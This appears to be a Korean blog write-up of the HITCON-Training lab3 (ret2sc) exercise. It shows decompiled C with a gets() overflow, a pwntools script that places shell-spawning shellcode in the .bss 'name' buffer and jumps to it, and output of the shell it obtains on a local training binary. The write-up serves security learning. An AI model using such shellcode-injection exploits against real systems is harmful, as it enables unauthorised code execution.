[HITCON-Training] lab3
2019. 10. 30. 21:32ㆍWargame & CTF/HITCON-Training
Summary
32bit
shellcode
Analysis
int __cdecl main(int argc, const char **argv, const char **envp)
{
char s; // [esp+1Ch] [ebp-14h]
setvbuf(stdout, 0, 2, 0);
printf("Name:");
read(0, &name, 0x32u);
printf("Try your best:");
return (int)gets(&s);
}name이 bss영역에 저장된다.
aslr이 걸려있어도 bss영역은 변하지 않으므로 name에 쉘코드를 넣고 s를 오버플로우 시켜서 ret에 name의 주소를 넣으면 된다.
Exploit
from pwn import *
context(arch="i386", os="linux")
e = ELF("./ret2sc")
p = process("./ret2sc")
name = 0x804a060
p.recvuntil("Name:");
payload = asm(shellcraft.sh())
p.send(payload)
p.recvuntil(":")
payload = ""
payload += "A"*(0x1c+0x4)
payload += p32(0x804a060)
p.sendline(payload)
p.interactive()cg10036@cg10036-virtual-machine:~/HITCON-Training/LAB/lab3$ p ex.py
[*] '/home/cg10036/HITCON-Training/LAB/lab3/ret2sc'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
[+] Starting local process './ret2sc': pid 3649
[*] Switching to interactive mode
$ id
uid=1000(cg10036) gid=1000(cg10036) groups=1000(cg10036),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),129(docker)'Wargame & CTF > HITCON-Training' 카테고리의 다른 글
| [HITCON-Training] lab7 (0) | 2019.11.18 |
|---|---|
| [HITCON-Training] lab5 (0) | 2019.11.11 |
| [HITCON-Training] lab4 (0) | 2019.11.04 |
| [HITCON-Training] lab2 (0) | 2019.10.30 |
| [HITCON-Training] lab1 (0) | 2019.10.30 |